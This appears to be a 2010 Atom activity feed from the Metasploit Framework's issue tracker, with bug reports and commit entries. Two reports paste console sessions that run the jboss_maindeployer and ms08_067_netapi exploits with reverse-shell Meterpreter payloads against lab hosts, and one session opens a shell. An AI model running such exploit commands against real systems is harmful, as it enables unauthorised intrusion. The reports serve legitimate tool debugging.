<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
  <title>Metasploit Framework: Activity</title>
  
  <link href="http://www.metasploit.com/redmine/projects/framework/activity" rel="alternate" />
  <id>http://www.metasploit.com/redmine/</id>
  <updated>2010-07-30T16:52:26-07:00</updated>
  <author>
    <name>Metasploit Redmine Interface</name>
  </author>
  <generator uri="http://www.redmine.org/">
Redmine  </generator>
  <atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/metasploit/development" /><feedburner:info uri="metasploit/development" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry>
    <title>Bug #2312 (New): jboss_maindeployer - undefined method `peerhost' for [Msf::Module::Platform::Win...</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/pot6EMN-3M4/2312" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2312</id>
    <updated>2010-07-30T16:52:26-07:00</updated>
    <author>
      <name>Amine Psy</name>
    </author>
    <content type="html">
&lt;p&gt;Hello, this is my first post and I hope that this could help improving metasploit.&lt;br /&gt;It is about jboss mail deployer. I am able to exploit this hole and send a payload to the deployer manually, but not using metasploit.&lt;/p&gt;


	&lt;p&gt;This is the scenario:&lt;/p&gt;


	&lt;p&gt;msf exploit(jboss_maindeployer) &gt; show options&lt;/p&gt;


	&lt;p&gt;Module options:&lt;/p&gt;


	&lt;pre&gt;&lt;code&gt;Name      Current Setting  Required  Description&lt;br /&gt;   ----      ---------------  --------  -----------&lt;br /&gt;   APPBASE                    no        Application base name, (default: random)&lt;br /&gt;   JSP                        no        JSP name to use without .jsp extension (default: random)&lt;br /&gt;   PASSWORD                   no        The password for the specified username&lt;br /&gt;   PATH      /jmx-console     yes       The URI path of the console&lt;br /&gt;   Proxies                    no        Use a proxy chain&lt;br /&gt;   RHOST     192.168.1.9      yes       The target address&lt;br /&gt;   RPORT     80               yes       The target port&lt;br /&gt;   SHELL     automatic        no        The system shell to use&lt;br /&gt;   SRVHOST   192.168.1.100    yes       The local host to listen on.&lt;br /&gt;   SRVPORT   8080             yes       The local port to listen on.&lt;br /&gt;   URIPATH                    no        The URI to use for this exploit (default is random)&lt;br /&gt;   USERNAME                   no        The username to authenticate as&lt;br /&gt;   VERB      POST             yes       The HTTP verb to use (for CVE-2010-0738)&lt;br /&gt;   VHOST                      no        HTTP server virtual host&lt;br /&gt;   WARHOST                    no        The host to request the WAR payload from&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;Payload options (windows/meterpreter/reverse_tcp):&lt;/p&gt;


	&lt;pre&gt;&lt;code&gt;Name      Current Setting  Required  Description&lt;br /&gt;   ----      ---------------  --------  -----------&lt;br /&gt;   EXITFUNC  process          yes       Exit technique: seh, thread, process&lt;br /&gt;   LHOST     192.168.1.100    yes       The listen address&lt;br /&gt;   LPORT     4444             yes       The listen port&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;Exploit target:&lt;/p&gt;


	&lt;pre&gt;&lt;code&gt;Id  Name&lt;br /&gt;   --  ----&lt;br /&gt;   0   Automatic&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;msf exploit(jboss_maindeployer) &gt; exploit&lt;/p&gt;


	&lt;p&gt;[*] Started reverse handler on 192.168.1.100:4444 &lt;br /&gt;[*] Attempting to automatically select a target...&lt;br /&gt;[*] Attempting to automatically detect the platform...&lt;br /&gt;[*] Automatically selected target "Windows Universal" &lt;br /&gt;[-] Exploit exception: undefined method `peerhost' for [Msf::Module::Platform::Windows]:Array&lt;br /&gt;[*] Exploit completed, but no session was created.&lt;/p&gt;


	&lt;p&gt;If you need more informations, just ask me.&lt;br /&gt;Thanks.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/pot6EMN-3M4" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2312</feedburner:origLink></entry>
  <entry>
    <title>Bug #2310: ms08_067_netapi and some others exploit does nor wotk since rev9914</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/FoPKjRsnMtU/2310" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2310#change-8527</id>
    <updated>2010-07-29T11:17:16-07:00</updated>
    <author>
      <name>Andrew Stubbs</name>
    </author>
    <content type="html">
&lt;p&gt;Seen this too - not sure of exact revision it stopped - but during the last week most likely&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/FoPKjRsnMtU" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2310#change-8527</feedburner:origLink></entry>
  <entry>
    <title>Bug #2311 (New): ibm_tsm_cad_ping currently classified as windows only</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/WRBfvu8wR9Q/2311" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2311</id>
    <updated>2010-07-29T10:27:51-07:00</updated>
    <author>
      <name>Bob Jones</name>
    </author>
    <content type="html">
&lt;p&gt;From what I can tell, I have come across some vulnerable HPUX systems that are running a vulnerable tivoli storage manager client.  It appears as though the exploit is successful, but I'm unable to attach a payload of a unix flavor because the exploit is currently listed in the windows branch.  I'd like to either see if there is a way to override the "not a compatible payload" error to fully test this or if it might be possible to see if the exploit does actually work on non-windows systems, and get it classified a bit differently.  Please accept my apologies if this is simply my own ignorance.  I did google a bit to try and find answers on my own.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/WRBfvu8wR9Q" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2311</feedburner:origLink></entry>
  <entry>
    <title>Bug #2310 (New): ms08_067_netapi and some others exploit does nor wotk since rev9914</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/-ptC6MTv368/2310" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2310</id>
    <updated>2010-07-29T09:19:35-07:00</updated>
    <author>
      <name>guess-it dzingg</name>
    </author>
    <content type="html">
&lt;p&gt;Hi,&lt;/p&gt;


	&lt;p&gt;Since Rev 9914 I'm not able to trigger anymore ms08_067_netapi exploit against a vulnerable test computer . below a small screen dump :&lt;/p&gt;


	&lt;p&gt;kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole &lt;/p&gt;
_
                               | |      o&lt;br /&gt; _  _  _    _ &lt;em&gt;|_  _&lt;/em&gt;,   ,    _  | |  &lt;em&gt;_    _|&lt;/em&gt;&lt;br /&gt;/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
	&lt;table&gt;
		&lt;tr&gt;
			&lt;td&gt;  &lt;/td&gt;
			&lt;td&gt;  &lt;/td&gt;
			&lt;th&gt;_/&lt;/th&gt;
			&lt;th&gt;__/&lt;/th&gt;
			&lt;th&gt;&lt;em&gt;/\&lt;/em&gt;/&lt;/th&gt;
			&lt;th&gt;_/ \/ &lt;/th&gt;
			&lt;th&gt;__/ &lt;/th&gt;
			&lt;th&gt;&lt;i&gt;/\&lt;/i&gt;/ &lt;/th&gt;
			&lt;th&gt;_/&lt;/th&gt;
			&lt;th&gt;_/&lt;br /&gt;                           /&lt;/th&gt;
			&lt;td&gt;&lt;br /&gt;                           \&lt;/td&gt;
		&lt;/tr&gt;
	&lt;/table&gt;




	&lt;pre&gt;&lt;code&gt;=[ metasploit v3.4.2-dev [core:3.4 api:1.0]&lt;br /&gt;+ -- --=[ 568 exploits - 292 auxiliary&lt;br /&gt;+ -- --=[ 212 payloads - 27 encoders - 8 nops&lt;br /&gt;       =[ svn r9913 updated 7 days ago (2010.07.22)&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;mssf &gt; &lt;br /&gt;msf &gt; use windows/smb/ms08_067_netapi&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; set PAYLOAD  windows/meterpreter/reverse_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; set RHOST 192.168.30.11&lt;br /&gt;RHOST =&gt; 192.168.30.11&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; set LHOST 192.168.30.1&lt;br /&gt;LHOST =&gt; 192.168.30.1&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; exploit&lt;/p&gt;


	&lt;p&gt;[*] Started reverse handler on 192.168.30.1:4444 &lt;br /&gt;[*] Automatically detecting the target...&lt;br /&gt;[*] Fingerprint: Windows XP Service Pack 2 - lang:French&lt;br /&gt;[*] Selected Target: Windows XP SP2 French (NX)&lt;br /&gt;[*] Attempting to trigger the vulnerability...&lt;br /&gt;[*] Sending stage (748032 bytes) to 192.168.30.11&lt;br /&gt;[*] Meterpreter session 1 opened (192.168.30.1:4444 -&gt; 192.168.30.11:1031) at Thu Jul 29 17:11:27 +0200 2010&lt;/p&gt;


	&lt;p&gt;meterpreter &gt; exit&lt;/p&gt;


	&lt;p&gt;[*] Meterpreter session 1 closed.  Reason: User exit&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; exit&lt;br /&gt;kill_tinnitus:/opt/metasploit/framework3/trunk# svn up&lt;/p&gt;


	&lt;p&gt;......&lt;/p&gt;


	&lt;p&gt;kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole &lt;/p&gt;
	&lt;pre&gt;&lt;code&gt;o                       8         o   o&lt;br /&gt;                 8                       8             8&lt;br /&gt;ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P&lt;br /&gt;8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8&lt;br /&gt;8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8&lt;br /&gt;8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8&lt;br /&gt;..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:&lt;br /&gt;::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::&lt;br /&gt;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::&lt;/code&gt;&lt;/pre&gt;


	&lt;pre&gt;&lt;code&gt;=[ metasploit v3.4.2-dev [core:3.4 api:1.0]&lt;br /&gt;+ -- --=[ 574 exploits - 292 auxiliary&lt;br /&gt;+ -- --=[ 212 payloads - 27 encoders - 8 nops&lt;br /&gt;       =[ svn r9942 updated today (2010.07.29)&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;msf &gt; use windows/smb/ms08_067_netapi&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; set PAYLOAD  windows/meterpreter/reverse_tcp&lt;br /&gt;PAYLOAD =&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; set LHOST 192.168.30.1&lt;br /&gt;LHOST =&gt; 192.168.30.1&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; set RHOST 192.168.30.11&lt;br /&gt;RHOST =&gt; 192.168.30.11&lt;br /&gt;msf exploit(ms08_067_netapi) &gt; exploit&lt;/p&gt;


	&lt;p&gt;[*] Started reverse handler on 192.168.30.1:4444 &lt;br /&gt;[*] Automatically detecting the target...&lt;br /&gt;[*] Fingerprint: Windows XP Service Pack 2 - lang:French&lt;br /&gt;[*] Selected Target: Windows XP SP2 French (NX)&lt;br /&gt;[*] Attempting to trigger the vulnerability...&lt;br /&gt;[*] Exploit completed, but no session was created.&lt;br /&gt;msf exploit(ms08_067_netapi) &gt;&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/-ptC6MTv368" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2310</feedburner:origLink></entry>
  <entry>
    <title>Revision 9942: initial lab plugin commit</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/LliVE-2934Y/9942" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9942</id>
    <updated>2010-07-28T20:50:59-07:00</updated>
    <author>
      <name>Jonathan Cran</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/LliVE-2934Y" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9942</feedburner:origLink></entry>
  <entry>
    <title>Revision 9941: updated lab controller</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/gpC1Y7vmckQ/9941" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9941</id>
    <updated>2010-07-28T20:50:31-07:00</updated>
    <author>
      <name>Jonathan Cran</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/gpC1Y7vmckQ" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9941</feedburner:origLink></entry>
  <entry>
    <title>Bug #2309 (New): -cl vs -c in multiscript.rb</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/1a6X4xuOuuE/2309" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2309</id>
    <updated>2010-07-28T18:17:41-07:00</updated>
    <author>
      <name>hunter hunter</name>
    </author>
    <content type="html">
&lt;p&gt;In opts.parse, the case is "-c":&lt;/p&gt;


	&lt;pre&gt;&lt;code&gt;when "-c" &lt;br /&gt;                commands = val.gsub(/;/,"\n")&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;But in exec_opts, the case is "-cl":&lt;/p&gt;


	&lt;pre&gt;&lt;code&gt;"-cl" =&amp;gt; [ true,"Collection of scripts to execute. Each script command must be enclosed in double quotes and separated by a semicolon."],&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;So the script should be changed like:&lt;/p&gt;


	&lt;p&gt;45,46c45&lt;br /&gt;&lt; &lt;br /&gt;&lt;       when "-c" &lt;br /&gt;---&lt;/p&gt;


&lt;blockquote&gt;

	&lt;p&gt;when "-cl"&lt;/p&gt;


&lt;/blockquote&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/1a6X4xuOuuE" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2309</feedburner:origLink></entry>
  <entry>
    <title>Revision 9940: Changing logic for the VRFY test.</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/l3kGi8LnUes/9940" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9940</id>
    <updated>2010-07-27T15:12:18-07:00</updated>
    <author>
      <name>Tod Beardsley</name>
      <email>todb@metasploit.com</email>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/l3kGi8LnUes" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9940</feedburner:origLink></entry>
  <entry>
    <title>Revision 9939: move the stdapi constants into the stdapi extension to save a little space when ph...</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/uKVqM-_js4Q/9939" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9939</id>
    <updated>2010-07-27T14:16:15-07:00</updated>
    <author>
      <name>James Lee</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/uKVqM-_js4Q" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9939</feedburner:origLink></entry>
  <entry>
    <title>Revision 9938: remove debug prints</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/ctZJTbvfH_U/9938" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9938</id>
    <updated>2010-07-27T14:05:41-07:00</updated>
    <author>
      <name>James Lee</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/ctZJTbvfH_U" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9938</feedburner:origLink></entry>
  <entry>
    <title>Bug #1158: db_add_host throws stack trace - undefined method `created_at'</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/J01Fn8IuNm0/1158" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/1158#change-8526</id>
    <updated>2010-07-27T11:05:17-07:00</updated>
    <author>
      <name>Jori Hardman</name>
    </author>
    <content type="html">
&lt;p&gt;I figured it out for anyone who has this problem in the future.  In my.cnf skip-networking was uncommented.  I commented that out and now there are no problems.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/J01Fn8IuNm0" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/1158#change-8526</feedburner:origLink></entry>
  <entry>
    <title>Bug #2307: lib/rex/elfparsey/elfbase.rb bug</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/i44GnHgs5hg/2307" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2307#change-8525</id>
    <updated>2010-07-27T11:04:22-07:00</updated>
    <author>
      <name>Joshua Drake</name>
    </author>
    <content type="html">
&lt;p&gt;Good eye, thanks for letting us know!&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/i44GnHgs5hg" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2307#change-8525</feedburner:origLink></entry>
  <entry>
    <title>Bug #2307 (Resolved): lib/rex/elfparsey/elfbase.rb bug</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/KP4vdhkU9wk/2307" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2307#change-8524</id>
    <updated>2010-07-27T11:03:55-07:00</updated>
    <author>
      <name>Joshua Drake</name>
    </author>
    <content type="html">
&lt;p&gt;Applied in changeset &lt;a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/9937" class="changeset" title="remove duped p_filesz entry, fixes #2307"&gt;r9937&lt;/a&gt;.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/KP4vdhkU9wk" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2307#change-8524</feedburner:origLink></entry>
  <entry>
    <title>Revision 9937: remove duped p_filesz entry, fixes #2307</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/Anc9ePsr9LE/9937" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9937</id>
    <updated>2010-07-27T11:03:18-07:00</updated>
    <author>
      <name>Joshua Drake</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/Anc9ePsr9LE" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/9937</feedburner:origLink></entry>
  <entry>
    <title>Bug #2308 (Assigned): cmd/printf_util produces incorrect code</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/4lDlEwj7rqo/2308" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2308#change-8523</id>
    <updated>2010-07-27T10:56:35-07:00</updated>
    <author>
      <name>Joshua Drake</name>
    </author>
    <content type="html">
&lt;p&gt;Indeed it will not work in bash/sh. The reason that this does not escape backslashes is that it was created for a php exploit that has magic_quotes_gpc turned on. Therefore, before getting executed it would become "printf${IFS}\\x30" which does work.&lt;/p&gt;


	&lt;p&gt;I open to other ideas for names, etc, for this encoder so that the exploit using it can continue to function... Perhaps we should just move it into the exploit itself as it may be a special enough case (super old system) to warrant that..&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/4lDlEwj7rqo" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2308#change-8523</feedburner:origLink></entry>
</feed>
